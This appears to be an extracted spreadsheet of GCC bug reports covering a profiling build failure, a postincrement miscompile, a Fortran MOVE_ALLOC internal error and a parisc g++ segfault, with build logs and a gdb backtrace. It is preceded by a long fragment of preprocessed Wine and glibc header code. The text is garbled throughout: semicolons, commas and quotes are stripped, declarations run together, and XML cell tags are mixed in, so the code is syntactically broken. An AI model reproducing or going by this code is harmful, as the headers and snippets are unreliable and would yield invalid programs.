typedef HANDLE16 HBRUSH16 typedef HBRUSH16 *PHBRUSH16 typedef HBRUSH16 *NPHBRUSH16 typedef HBRUSH16 *LPHBRUSH16
typedef HANDLE16 HCOLORSPACE16 typedef HCOLORSPACE16 *PHCOLORSPACE16 typedef HCOLORSPACE16 *NPHCOLORSPACE16 typedef HCOLORSPACE16 *LPHCOLORSPACE16
typedef HANDLE16 HCURSOR16 typedef HCURSOR16 *PHCURSOR16 typedef HCURSOR16 *NPHCURSOR16 typedef HCURSOR16 *LPHCURSOR16
typedef HANDLE16 HDC16 typedef HDC16 *PHDC16 typedef HDC16 *NPHDC16 typedef HDC16 *LPHDC16
typedef HANDLE16 HDROP16 typedef HDROP16 *PHDROP16 typedef HDROP16 *NPHDROP16 typedef HDROP16 *LPHDROP16
typedef HANDLE16 HDRVR16 typedef HDRVR16 *PHDRVR16 typedef HDRVR16 *NPHDRVR16 typedef HDRVR16 *LPHDRVR16
typedef HANDLE16 HDWP16 typedef HDWP16 *PHDWP16 typedef HDWP16 *NPHDWP16 typedef HDWP16 *LPHDWP16
typedef HANDLE16 HENHMETAFILE16 typedef HENHMETAFILE16 *PHENHMETAFILE16 typedef HENHMETAFILE16 *NPHENHMETAFILE16 typedef HENHMETAFILE16 *LPHENHMETAFILE16
typedef HANDLE16 HFILE16 typedef HFILE16 *PHFILE16 typedef HFILE16 *NPHFILE16 typedef HFILE16 *LPHFILE16
typedef HANDLE16 HFONT16 typedef HFONT16 *PHFONT16 typedef HFONT16 *NPHFONT16 typedef HFONT16 *LPHFONT16
typedef HANDLE16 HICON16 typedef HICON16 *PHICON16 typedef HICON16 *NPHICON16 typedef HICON16 *LPHICON16
typedef HANDLE16 HINSTANCE16 typedef HINSTANCE16 *PHINSTANCE16 typedef HINSTANCE16 *NPHINSTANCE16 typedef HINSTANCE16 *LPHINSTANCE16
typedef HANDLE16 HKEY16 typedef HKEY16 *PHKEY16 typedef HKEY16 *NPHKEY16 typedef HKEY16 *LPHKEY16
typedef HANDLE16 HMENU16 typedef HMENU16 *PHMENU16 typedef HMENU16 *NPHMENU16 typedef HMENU16 *LPHMENU16
typedef HANDLE16 HMETAFILE16 typedef HMETAFILE16 *PHMETAFILE16 typedef HMETAFILE16 *NPHMETAFILE16 typedef HMETAFILE16 *LPHMETAFILE16
typedef HANDLE16 HMIDI16 typedef HMIDI16 *PHMIDI16 typedef HMIDI16 *NPHMIDI16 typedef HMIDI16 *LPHMIDI16
typedef HANDLE16 HMIDIIN16 typedef HMIDIIN16 *PHMIDIIN16 typedef HMIDIIN16 *NPHMIDIIN16 typedef HMIDIIN16 *LPHMIDIIN16
typedef HANDLE16 HMIDIOUT16 typedef HMIDIOUT16 *PHMIDIOUT16 typedef HMIDIOUT16 *NPHMIDIOUT16 typedef HMIDIOUT16 *LPHMIDIOUT16
typedef HANDLE16 HMIDISTRM16 typedef HMIDISTRM16 *PHMIDISTRM16 typedef HMIDISTRM16 *NPHMIDISTRM16 typedef HMIDISTRM16 *LPHMIDISTRM16
typedef HANDLE16 HMIXER16 typedef HMIXER16 *PHMIXER16 typedef HMIXER16 *NPHMIXER16 typedef HMIXER16 *LPHMIXER16
typedef HANDLE16 HMIXEROBJ16 typedef HMIXEROBJ16 *PHMIXEROBJ16 typedef HMIXEROBJ16 *NPHMIXEROBJ16 typedef HMIXEROBJ16 *LPHMIXEROBJ16
typedef HANDLE16 HMMIO16 typedef HMMIO16 *PHMMIO16 typedef HMMIO16 *NPHMMIO16 typedef HMMIO16 *LPHMMIO16
typedef HANDLE16 HPALETTE16 typedef HPALETTE16 *PHPALETTE16 typedef HPALETTE16 *NPHPALETTE16 typedef HPALETTE16 *LPHPALETTE16
typedef HANDLE16 HPEN16 typedef HPEN16 *PHPEN16 typedef HPEN16 *NPHPEN16 typedef HPEN16 *LPHPEN16
typedef HANDLE16 HQUEUE16 typedef HQUEUE16 *PHQUEUE16 typedef HQUEUE16 *NPHQUEUE16 typedef HQUEUE16 *LPHQUEUE16
typedef HANDLE16 HRGN16 typedef HRGN16 *PHRGN16 typedef HRGN16 *NPHRGN16 typedef HRGN16 *LPHRGN16
typedef HANDLE16 HRSRC16 typedef HRSRC16 *PHRSRC16 typedef HRSRC16 *NPHRSRC16 typedef HRSRC16 *LPHRSRC16
typedef HANDLE16 HTASK16 typedef HTASK16 *PHTASK16 typedef HTASK16 *NPHTASK16 typedef HTASK16 *LPHTASK16
typedef HANDLE16 HWAVE16 typedef HWAVE16 *PHWAVE16 typedef HWAVE16 *NPHWAVE16 typedef HWAVE16 *LPHWAVE16
typedef HANDLE16 HWAVEIN16 typedef HWAVEIN16 *PHWAVEIN16 typedef HWAVEIN16 *NPHWAVEIN16 typedef HWAVEIN16 *LPHWAVEIN16
typedef HANDLE16 HWAVEOUT16 typedef HWAVEOUT16 *PHWAVEOUT16 typedef HWAVEOUT16 *NPHWAVEOUT16 typedef HWAVEOUT16 *LPHWAVEOUT16
typedef HANDLE16 HWINSTA16 typedef HWINSTA16 *PHWINSTA16 typedef HWINSTA16 *NPHWINSTA16 typedef HWINSTA16 *LPHWINSTA16
typedef HANDLE16 HDESK16 typedef HDESK16 *PHDESK16 typedef HDESK16 *NPHDESK16 typedef HDESK16 *LPHDESK16
typedef HANDLE16 HWND16 typedef HWND16 *PHWND16 typedef HWND16 *NPHWND16 typedef HWND16 *LPHWND16
typedef HANDLE16 HKL16 typedef HKL16 *PHKL16 typedef HKL16 *NPHKL16 typedef HKL16 *LPHKL16
typedef HANDLE16 HIC16 typedef HIC16 *PHIC16 typedef HIC16 *NPHIC16 typedef HIC16 *LPHIC16
typedef HANDLE16 HRASCONN16 typedef HRASCONN16 *PHRASCONN16 typedef HRASCONN16 *NPHRASCONN16 typedef HRASCONN16 *LPHRASCONN16
typedef HINSTANCE16 HMODULE16
typedef HANDLE16 HGDIOBJ16
typedef HANDLE16 HGLOBAL16
typedef HANDLE16 HLOCAL16
typedef struct
{
    INT16 cx
    INT16 cy
} SIZE16 *PSIZE16 *LPSIZE16
typedef struct
{
    INT16 x
    INT16 y
} POINT16 *PPOINT16 *LPPOINT16
typedef struct
{
    INT16 left
    INT16 top
    INT16 right
    INT16 bottom
} RECT16 *LPRECT16
typedef LRESULT __attribute__((__stdcall__)) (*DRIVERPROC16)(DWORDHDRVR16UINT16LPARAMLPARAM)
typedef WIN_BOOL16 __attribute__((__stdcall__)) (*DLGPROC16)(HWND16UINT16WPARAM16LPARAM)
typedef INT16 __attribute__((__stdcall__)) (*EDITWORDBREAKPROC16)(LPSTRINT16INT16INT16)
typedef LRESULT __attribute__((__stdcall__)) (*FARPROC16)()
typedef INT16 __attribute__((__stdcall__)) (*PROC16)()
typedef WIN_BOOL16 __attribute__((__stdcall__)) (*GRAYSTRINGPROC16)(HDC16LPARAMINT16)
typedef LRESULT __attribute__((__stdcall__)) (*HOOKPROC16)(INT16WPARAM16LPARAM)
typedef WIN_BOOL16 __attribute__((__stdcall__)) (*PROPENUMPROC16)(HWND16SEGPTRHANDLE16)
typedef VOID __attribute__((__stdcall__)) (*TIMERPROC16)(HWND16UINT16UINT16DWORD)
typedef LRESULT __attribute__((__stdcall__)) (*WNDENUMPROC16)(HWND16LPARAM)
typedef LRESULT __attribute__((__stdcall__)) (*WNDPROC16)(HWND16UINT16WPARAM16LPARAM)
# 578 wine/windef.h
typedef struct tagSIZE
{
    INT cx
    INT cy
} SIZE *PSIZE *LPSIZE
typedef SIZE SIZEL *PSIZEL *LPSIZEL
typedef struct tagPOINT
{
    LONG x
    LONG y
} POINT *PPOINT *LPPOINT
typedef struct _POINTL
{
    LONG x
    LONG y
} POINTL
# 614 wine/windef.h
typedef struct tagPOINTS
{
        SHORT x
        SHORT y
} POINTS *PPOINTS *LPPOINTS
typedef struct tagRECT
{
    short left
    short top
    short right
    short bottom
} RECT *PRECT *LPRECT
typedef const RECT *LPCRECT
typedef struct tagRECTL
{
    LONG left
    LONG top
    LONG right
    LONG bottom
} RECTL *PRECTL *LPRECTL
typedef const RECTL *LPCRECTL
# 7 win32.h 2
# 1 wine/winbase.h 1
# 1 wine/basetsd.h 1
# 10 wine/basetsd.h
# 1 ../config.h 1
# 11 wine/basetsd.h 2
# 31 wine/basetsd.h
typedef char __int8
typedef unsigned char __uint8
typedef short __int16
typedef unsigned short __uint16
typedef int __int32
typedef unsigned int __uint32
typedef long long __int64
typedef unsigned long long __uint64
# 50 wine/basetsd.h
typedef void *__ptr32
typedef __uint64 __ptr64
typedef __int32 LONG32
typedef LONG32 *PLONG32
typedef __uint32 ULONG32
typedef __uint32 DWORD32
typedef __uint32 UINT32
typedef ULONG32 *PULONG32
typedef DWORD32 *PDWORD32
typedef UINT32 *PUINT32
typedef __int64 LONG64
typedef __int64 INT64
typedef LONG64 *PLONG64
typedef INT64 *PINT64
typedef __uint64 ULONG64
typedef __uint64 DWORD64
typedef __uint64 UINT64
typedef ULONG64 *PULONG64
typedef DWORD64 *PDWORD64
typedef UINT64 *PUINT64
# 115 wine/basetsd.h
typedef __int32 INT_PTR *PINT_PTR
typedef __uint32 UINT_PTR *PUINT_PTR
typedef __int16 HALF_PTR *PHALF_PTR
typedef __uint16 UHALF_PTR *PUHALF_PTR
typedef __int32 LONG_PTR *PLONG_PTR
typedef __uint32 ULONG_PTR *PULONG_PTR
typedef __uint32 DWORD_PTR *PDWORD_PTR
typedef INT_PTR SSIZE_T *PSSIZE_T
typedef UINT_PTR SIZE_T *PSIZE_T
# 5 wine/winbase.h 2
# 1 wine/winnt.h 1
# 10 wine/winnt.h
# 1 wine/windef.h 1
# 11 wine/winnt.h 2
# 1 /usr/include/string.h 1 3
# 26 /usr/include/string.h 3
# 1 /usr/include/features.h 1 3
# 27 /usr/include/string.h 2 3
# 1 /usr/lib/gcc-lib/i386-linux/3.0.2/include/stddef.h 1 3
# 34 /usr/include/string.h 2 3
extern void *memcpy (void *__restrict __dest
                     __const void *__restrict __src size_t __n) 
extern void *memmove (void *__dest __const void *__src size_t __n)
extern void *memccpy (void *__restrict __dest __const void *__restrict __src
                      int __c size_t __n)
extern void *memset (void *__s int __c size_t __n) 
extern int memcmp (__const void *__s1 __const void *__s2 size_t __n)
             __attribute__ ((__pure__))
extern void *memchr (__const void *__s int __c size_t __n)
              __attribute__ ((__pure__))
# 77 /usr/include/string.h 3
extern char *strcpy (char *__restrict __dest __const char *__restrict __src)
extern char *strncpy (char *__restrict __dest
                      __const char *__restrict __src size_t __n) 
extern char *strcat (char *__restrict __dest __const char *__restrict __src)
extern char *strncat (char *__restrict __dest __const char *__restrict __src
                      size_t __n) 
extern int strcmp (__const char *__s1 __const char *__s2)
             __attribute__ ((__pure__))
extern int strncmp (__const char *__s1 __const char *__s2 size_t __n)
             __attribute__ ((__pure__))
extern int strcoll (__const char *__s1 __const char *__s2)
             __attribute__ ((__pure__))
extern size_t strxfrm (char *__restrict __dest
                       __const char *__restrict __src size_t __n) 
# 120 /usr/include/string.h 3
extern char *strdup (__const char *__s) __attribute__ ((__malloc__))
# 155 /usr/include/string.h 3
extern char *strchr (__const char *__s int __c) __attribute__ ((__pure__))
extern char *strrchr (__const char *__s int __c) __attribute__ ((__pure__))
# 167 /usr/include/string.h 3
extern size_t strcspn (__const char *__s __const char *__reject)
             __attribute__ ((__pure__))
extern size_t strspn (__const char *__s __const char *__accept)
             __attribute__ ((__pure__))
extern char *strpbrk (__const char *__s __const char *__accept)
             __attribute__ ((__pure__))
extern char *strstr (__const char *__haystack __const char *__needle)
             __attribute__ ((__pure__))
# 187 /usr/include/string.h 3
extern char *strtok (char *__restrict __s __const char *__restrict __delim)
extern char *__strtok_r (char *__restrict __s
                         __const char *__restrict __delim
                         char **__restrict __save_ptr) 
extern char *strtok_r (char *__restrict __s __const char *__restrict __delim
                       char **__restrict __save_ptr) 
# 218 /usr/include/string.h 3
extern size_t strlen (__const char *__s) __attribute__ ((__pure__))
# 229 /usr/include/string.h 3
extern char *strerror (int __errnum) 
extern char *strerror_r (int __errnum char *__buf size_t __buflen) 
extern void __bzero (void *__s size_t __n) 
extern void bcopy (__const void *__src void *__dest size_t __n) 
extern void bzero (void *__s size_t __n) 
extern int bcmp (__const void *__s1 __const void *__s2 size_t __n)
             __attribute__ ((__pure__))
extern char *index (__const char *__s int __c) __attribute__ ((__pure__))
extern char *rindex (__const char *__s int __c) __attribute__ ((__pure__))
extern int ffs (int __i) __attribute__ ((__const__))
# 272 /usr/include/string.h 3
extern int strcasecmp (__const char *__s1 __const char *__s2)
             __attribute__ ((__pure__))
extern int strncasecmp (__const char *__s1 __const char *__s2 size_t __n)
             __attribute__ ((__pure__))
# 294 /usr/include/string.h 3
extern char *strsep (char **__restrict __stringp
                     __const char *__restrict __delim) 
# 357 /usr/include/string.h 3
# 1 /usr/include/bits/string.h 1 3
# 358 /usr/include/string.h 2 3
# 1 /usr/include/bits/string2.h 1 3
# 52 /usr/include/bits/string2.h 3
# 1 /usr/include/endian.h 1 3
# 22 /usr/include/endian.h 3
# 1 /usr/include/features.h 1 3
# 23 /usr/include/endian.h 2 3
# 37 /usr/include/endian.h 3
# 1 /usr/include/bits/endian.h 1 3
# 38 /usr/include/endian.h 2 3
# 53 /usr/include/bits/string2.h 2 3
# 1 /usr/include/bits/types.h 1 3
# 54 /usr/include/bits/string2.h 2 3
# 371 /usr/include/bits/string2.h 3
extern void *__rawmemchr (const void *__s int __c)
# 395 /usr/include/bits/string2.h 3
extern __inline char *__strcpy_small (char * __uint16_t __uint16_t
                                      __uint32_t __uint32_t size_t)
extern __inline char *
__strcpy_small (char *__dest
                __uint16_t __src0_2 __uint16_t __src4_2
                __uint32_t __src0_4 __uint32_t __src4_4
                size_t __srclen)
{
  union {
    __uint32_t __ui
    __uint16_t __usi
    unsigned char __uc
  } *__u = (void *) __dest
  switch ((unsigned int) __srclen)
    {
    case 1:
      __u-&gt;__uc = '\0'
      break
    case 2:
      __u-&gt;__usi = __src0_2
      break
    case 3:
      __u-&gt;__usi = __src0_2
      __u = __extension__ (void *)((char *) __u + 2)
      __u-&gt;__uc = '\0'
      break
    case 4:
      __u-&gt;__ui = __src0_4
      break
    case 5:
      __u-&gt;__ui = __src0_4
      __u = __extension__ (void *)((char *) __u + 4)
      __u-&gt;__uc = '\0'
      break
    case 6:
      __u-&gt;__ui = __src0_4
      __u = __extension__ (void *)((char *) __u + 4)
      __u-&gt;__usi = __src4_2
      break
    case 7:
      __u-&gt;__ui = __src0_4
      __u = __extension__ (void *)((char *) __u + 4)
      __u-&gt;__usi = __src4_2
      __u = __extension__ (void *)((char *) __u + 2)
      __u-&gt;__uc = '\0'
      break
    case 8:
      __u-&gt;__ui = __src0_4
      __u = __extension__ (void *)((char *) __u + 4)
      __u-&gt;__ui = __src4_4
      break
    }
  return __dest
}
# 873 /usr/include/bits/string2.h 3
extern __inline size_t __strcspn_c1 (__const char *__s char __reject)
extern __inline size_t
__strcspn_c1 (__const char *__s char __reject)
{
  register size_t __result = 0
  while (__s[__result] != '\0' &amp;&amp; __s[__result] != __reject)
    ++__result
  return __result
}
extern __inline size_t __strcspn_c2 (__const char *__s char __reject1
                                     char __reject2)
extern __inline size_t
__strcspn_c2 (__const char *__s char __reject1 char __reject2)
{
  register size_t __result = 0
  while (__s[__result] != '\0' &amp;&amp; __s[__result] != __reject1
         &amp;&amp; __s[__result] != __reject2)
    ++__result
  return __result
}
extern __inline size_t __strcspn_c3 (__const char *__s char __reject1
                                     char __reject2 char __reject3)
extern __inline size_t
__strcspn_c3 (__const char *__s char __reject1 char __reject2
              char __reject3)
{
  register size_t __result = 0
  while (__s[__result] != '\0' &amp;&amp; __s[__result] != __reject1
         &amp;&amp; __s[__result] != __reject2 &amp;&amp; __s[__result] != __reject3)
    ++__result
  return __result
}
# 928 /usr/include/bits/string2.h 3
extern __inline size_t __strspn_c1 (__const char *__s char __accept)
extern __inline size_t
__strspn_c1 (__const char *__s char __accept)
{
  register size_t __result = 0
  while (__s[__result] == __accept)
    ++__result
  return __result
}
extern __inline size_t __strspn_c2 (__const char *__s char __accept1
                                    char __accept2)
extern __inline size_t
__strspn_c2 (__const char *__s char __accept1 char __accept2)
{
  register size_t __result = 0
  while (__s[__result] == __accept1 || __s[__result] == __accept2)
    ++__result
  return __result
}
extern __inline size_t __strspn_c3 (__const char *__s char __accept1
                                    char __accept2 char __accept3)
extern __inline size_t
__strspn_c3 (__const char *__s char __accept1 char __accept2 char __accept3)
{
  register size_t __result = 0
  while (__s[__result] == __accept1 || __s[__result] == __accept2
         || __s[__result] == __accept3)
    ++__result
  return __result
}
# 983 /usr/include/bits/string2.h 3
extern __inline char *__strpbrk_c2 (__const char *__s int __accept1
                                     int __accept2)
extern __inline char *
__strpbrk_c2 (__const char *__s int __accept1 int __accept2)
{
  while (*__s != '\0' &amp;&amp; *__s != __accept1 &amp;&amp; *__s != __accept2)
    ++__s
  return *__s == '\0' ? ((void *)0) : (char *) (size_t) __s
}
extern __inline char *__strpbrk_c3 (__const char *__s int __accept1
   </t>
  </si>
  <si>
    <t>z0001</t>
  </si>
  <si>
    <t>GCC-31142</t>
  </si>
  <si>
    <t>Build with CC='gcc -pg' fails</t>
  </si>
  <si>
    <t>Configuring with
 ../configure --enable-languages=cfortran --with-gmp=/sw CC='gcc -pg'
and optionally --disable-botstrap fails with
# @multilib_dir@ is not really necessary but sometimes it has
# more uses than just a directory name.
/bin/sh ../../../../libgcc/../mkinstalldirs x86_64
/Users/tobi/src/pristine/profile/./gcc/xgcc -B/Users/tobi/src/pristine/profile
/gcc/ -B/usr/local/i386-apple-darwin8.8.3/bin/ -B/usr/local/i386-apple-darwin8
.3/lib/ -isystem /usr/local/i386-apple-darwin8.8.3/include -isystem /usr/local
386-apple-darwin8.8.3/sys-include -O2  -O2 -g -O2  -DIN_GCC    -W -Wall -Wwrit
strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isys
m ./include  -fPIC -pipe -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT
EEDED  -dynamiclib -nodefaultlibs -install_name /usr/local/lib/libgcc_s`if tes
x86_64 = ppc64  then echo _x86_64  fi`.1.dylib -single_module -o x86_64/libg
_s.1.dylib.tmp -Wl-exported_symbols_listlibgcc.map -compatibility_version 1 
urrent_version 1.0 -g -fkeep-inline-functions -m64 -B./ _muldi3_s.o _negdi2_s.
_lshrdi3_s.o _ashldi3_s.o _ashrdi3_s.o _cmpdi2_s.o _ucmpdi2_s.o _clear_cache_s
 _enable_execute_stack_s.o _trampoline_s.o __main_s.o _absvsi2_s.o _absvdi2_s.
_addvsi3_s.o _addvdi3_s.o _subvsi3_s.o _subvdi3_s.o _mulvsi3_s.o _mulvdi3_s.o 
egvsi2_s.o _negvdi2_s.o _ctors_s.o _ffssi2_s.o _ffsdi2_s.o _clz_s.o _clzsi2_s.
_clzdi2_s.o _ctzsi2_s.o _ctzdi2_s.o _popcount_tab_s.o _popcountsi2_s.o _popcou
di2_s.o _paritysi2_s.o _paritydi2_s.o _powisf2_s.o _powidf2_s.o _powixf2_s.o _
witf2_s.o _mulsc3_s.o _muldc3_s.o _mulxc3_s.o _multc3_s.o _divsc3_s.o _divdc3_
o _divxc3_s.o _divtc3_s.o _bswapsi2_s.o _bswapdi2_s.o _fixunssfsi_s.o _fixunsd
i_s.o _fixunsxfsi_s.o _fixsfdi_s.o _fixdfdi_s.o _fixxfdi_s.o _fixtfdi_s.o _fix
ssfdi_s.o _fixunsdfdi_s.o _fixunsxfdi_s.o _fixunstfdi_s.o _floatdisf_s.o _floa
idf_s.o _floatdixf_s.o _floatditf_s.o _floatundisf_s.o _floatundidf_s.o _float
dixf_s.o _floatunditf_s.o _fixsfti_s.o _fixdfti_s.o _fixxfti_s.o _fixtfti_s.o 
ixunssfti_s.o _fixunsdfti_s.o _fixunsxfti_s.o _fixunstfti_s.o _floattisf_s.o _
oattidf_s.o _floattixf_s.o _floattitf_s.o _floatuntisf_s.o _floatuntidf_s.o _f
atuntixf_s.o _floatuntitf_s.o _divdi3_s.o _moddi3_s.o _udivdi3_s.o _umoddi3_s.
_udiv_w_sdiv_s.o _udivmoddi4_s.o darwin-64_s.o unwind-dw2_s.o unwind-dw2-fde-d
win_s.o unwind-sjlj_s.o unwind-c_s.o emutls_s.o -lc
i686-apple-darwin8-gcc-4.0.1: 1: No such file or directory
i686-apple-darwin8-gcc-4.0.1: 1.0: No such file or directory
i686-apple-darwin8-gcc-4.0.1: /usr/local/lib/libgcc_s.1.dylib: No such file or
irectory
i686-apple-darwin8-gcc-4.0.1: 10.4: No such file or directory
collect2: ld returned 1 exit status
make[5]: *** [libgcc_s.dylib] Error 1
make[4]: *** [multi-do] Error 1
make[3]: *** [all-multi] Error 2
make[2]: *** [all-stage1-target-libgcc] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2
[1]-  Done                    xchat  (wd: ~)
(wd now: ~/src/pristine/profile)
tobias-schluters-computer:~/src/pristine/profile tobi$</t>
  </si>
  <si>
    <t>GCC-9062</t>
  </si>
  <si>
    <t>gcc 3.2.0 3.2.1 optimization bug with postincrement</t>
  </si>
  <si>
    <t>The following code miscompiles with g++ -O2 gcc-3.2.0 gcc-3.2.1. -O013 gives correct results. Output of -O2 
is bcdefgh instead of abcdefgh
Equivalent in c only works with -O1.
----------------------
#include 
using namespace std
void str2lower(char *p) {
  while(*p) *p++=tolower(*p)
}
int main() {
  char str[]=Abcdefgh
  str2lower(str)
  cout&lt;&lt;str&lt;&lt;endl
}
Release:
unknown
Environment:
redhat 8.0</t>
  </si>
  <si>
    <t>andrej.filipcic</t>
  </si>
  <si>
    <t>GCC-51970</t>
  </si>
  <si>
    <t>[OOP] gimplification failed for polymorphic MOVE_ALLOC</t>
  </si>
  <si>
    <t>Compiling the following (invalid?) avatar of pr51948
type t
end type t
contains
  function func(x)
    class(t) allocatable :: x(:) func2(:)
    call move_alloc (x func2)
! FAILS: Error: the 'from' and 'to' arguments of 'move_alloc' intrinsic at (1) must have the same rank 0/1
  end function
  function func2(x)
    type(t) allocatable :: x
    class(t) allocatable :: func2
    call move_alloc (x func2)
! FAILS: Error: 'to' argument of 'move_alloc' intrinsic at (1) must be a variable
  end function
end
gives the following ICE
gimplification failed:
&amp;func2._data &lt;addr_expr 0x142d38550
    type &lt;pointer_type 0x142d332a0
        type &lt;record_type 0x142d2fdc8 array1_t type_1 BLK
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x142d2fe70 fields 
            pointer_to_this  chain &gt;
        public unsigned DI
        size 
        unit size 
        align 64 symtab 0 alias set -1 canonical type 0x142d33348&gt;
    arg 0 
        arg 0 
            addressable used BLK file pr51948_db.f90 line 6 col 0
            size 
            unit size 
            align 64 context &gt;
        arg 1 
            BLK file pr51948_db.f90 line 6 col 0 size  unit size 
            align 64 offset_align 128
            offset 
            bit offset  context  chain &gt;
        pr51948_db.f90:7:0&gt;
    pr51948_db.f90:7:0&gt;
pr51948_db.f90: In function 'func':
pr51948_db.f90:7:0: internal compiler error: gimplification failed
This may due to the patch at http://gcc.gnu.org/ml/fortran/2012-01/msg00213.html . The code is accepted by trunk r183357.</t>
  </si>
  <si>
    <t>GCC-7316</t>
  </si>
  <si>
    <t>[parisc] g++ sigsegv</t>
  </si>
  <si>
    <t xml:space="preserve"> Confidential:  no
 Severity: critical
 Priority: medium
 Category: c++
 Release:       3.2 20020714 (experimental)
 System: Linux c3000 2.4.18-pa55 #253 Sun Jul 14 12:50:21 CEST 2002 parisc unknown unknown GNU/Linux
 Architecture: parisc
 host: hppa-unknown-linux-gnu
 build: hppa-unknown-linux-gnu
 target: hppa-unknown-linux-gnu
 configured with: /home/cvs/gcc/configure -v --enable-languages=cc++ --prefix=/usr/local --infodir=/share/local/info --mandir=/share/local/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-includ ed-gettext --disable-checking --enable-threads=posix --with-cpp-install-dir=bin hppa-linux : (reconfigured)  : (reconfigured) /home/cvs/gcc/configure -v --enable-languages=cc++ --prefix=/usr/local --infodir=/share/local/info --mandir=/share/local/man -- enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --with-cpp-install-dir=bin hppa-linux : (reconfigured)
 Description: g++ sigsegvs while compiling a c++ file from libqt
 Preprocessed splashloader.ii source file (250kb) is available at:
 http://parisc-linux.org/~deller/splashloader.ii.bz2
 deller@c3000:/opt/qt-copy/tools/designer/designer$ g++ -c -pipe -fno-exceptions -fno-exceptions -Wall -W -Os -ffunction-sections -mpa-risc-2-0 -D_REENTRANT  -DQT_INTERNAL_XML -DQT_INTERNAL_WORKSPACE -DQT_INTERNAL_ICONVIEW -DDESIGNER -DQT_NO_DEBUG -DQT_TH READ_SUPPORT -DQT_SHARED -I/usr/include/freetype2 -I../shared -I../uilib -I../../../src/3rdparty/zlib -I/opt/kde/qt/include -I.moc/release-shared-mt/ -I/opt/kde/qt/mkspecs/linux-g++ -o splashloader.o splashloader.cpp -v
 Reading specs from /usr/local/lib/gcc-lib/hppa-linux/3.2/specs
 Configured with: /home/cvs/gcc/configure -v --enable-languages=cc++ --prefix=/usr/local --infodir=/share/local/info --mandir=/share/local/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-includ ed-gettext --disable-checking --enable-threads=posix --with-cpp-install-dir=bin hppa-linux : (reconfigured)  : (reconfigured) /home/cvs/gcc/configure -v --enable-languages=cc++ --prefix=/usr/local --infodir=/share/local/info --mandir=/share/local/man -- enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --with-cpp-install-dir=bin hppa-linux : (reconfigured)
 Thread model: posix
 gcc version 3.2 20020714 (experimental)
  /usr/local/lib/gcc-lib/hppa-linux/3.2/cc1plus -quiet -v -I/usr/include/freetype2 -I../shared -I../uilib -I../../../src/3rdparty/zlib -I/opt/kde/qt/include -I.moc/release-shared-mt/ -I/opt/kde/qt/mkspecs/linux-g++ -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC _PATCHLEVEL__=0 -D__ELF__ -Dunix -D__hppa__ -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__hppa__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=unix -Asystem=posix -Acpu=hppa -Amachine=hppa -Amachine=bigendian -D_GNU_SOURCE -D_PA_RISC1_1 -D_R EENTRANT -DQT_INTERNAL_XML -DQT_INTERNAL_WORKSPACE -DQT_INTERNAL_ICONVIEW -DDESIGNER -DQT_NO_DEBUG -DQT_THREAD_SUPPORT -DQT_SHARED splashloader.cpp -D__GNUG__=3 -D__DEPRECATED -D__GXX_ABI_VERSION=100 -quiet -dumpbase splashloader.cpp -mpa-risc-2-0 -Os -W all -W -version -fno-exceptions -fno-exceptions -ffunction-sections -o - |
  as -V -o splashloader.o -
 GNU C++ version 3.2 20020714 (experimental) (hppa-linux)
         compiled by GNU C version 3.2 20020713 (experimental).
 ignoring nonexistent directory /usr/local/hppa-linux/include
 GNU assembler version 2.12.90 (hppa2.0-unknown-linux-gnu) using BFD version 2.12.90 20020710
 #include ... search starts here:
 #include  search starts here:
  /usr/include/freetype2
  ../shared
  ../uilib
  ../../../src/3rdparty/zlib
  /opt/kde/qt/include
  .moc/release-shared-mt
  /opt/kde/qt/mkspecs/linux-g++
  /usr/local/include/c++/3.2
  /usr/local/include/c++/3.2/hppa-linux
  /usr/local/include/c++/3.2/backward
  /usr/local/include
  /usr/local/lib/gcc-lib/hppa-linux/3.2/include
  /usr/include
 End of search list.
 g++: Internal error: Segmentation fault (program cc1plus)
 Please submit a full bug report.
 See  for instructions.
 deller@c3000:/opt/qt-copy/tools/designer/designer$ gdb /usr/local/lib/gcc-lib/hppa-linux/3.2/cc1plus
 GNU gdb 2002-04-01-cvs
 Copyright 2002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hppa-linux...set ar
 (gdb) set args -fpreprocessed splashloader.ii -quiet -dumpbase splashloader.cpp -mpa-risc-2-0 -Os -Wall -W -version -fno-exceptions -fno-exceptions -ffunction-sections -o splashloader.s
 (gdb) run
 Starting program: /usr/local/lib/gcc-lib/hppa-linux/3.2/cc1plus -fpreprocessed splashloader.ii -quiet -dumpbase splashloader.cpp -mpa-risc-2-0 -Os -Wall -W -version -fno-exceptions -fno-exceptions -ffunction-sections -o splashloader.s
 GNU C++ version 3.2 20020714 (experimental) (hppa-linux)
         compiled by GNU C version 3.2 20020713 (experimental).
 Program received signal SIGSEGV Segmentation fault.
 tree_node_structure (t=0x41ac21c8) at /home/cvs/gcc/gcc/tree.c:1532
 1532    {
 (gdb) bt
 #0  tree_node_structure (t=0x41ac21c8) at /home/cvs/gcc/gcc/tree.c:1532
 #1  0x000377a4 in gt_ggc_mx_lang_tree_node (x_p=0x41ac21c8) at gtype-cp.h:79
 #2  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac2108) at gtype-cp.h:177
 #3  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac2048) at gtype-cp.h:177
 #4  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1f78) at gtype-cp.h:177
 #5  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1eb8) at gtype-cp.h:177
 #6  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1df8) at gtype-cp.h:177
 #7  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1d38) at gtype-cp.h:177
 #8  0x00037a20 in gt_ggc_mx_lang_tree_node (x_p=0x41ac1c78) at gtype-cp.h:177
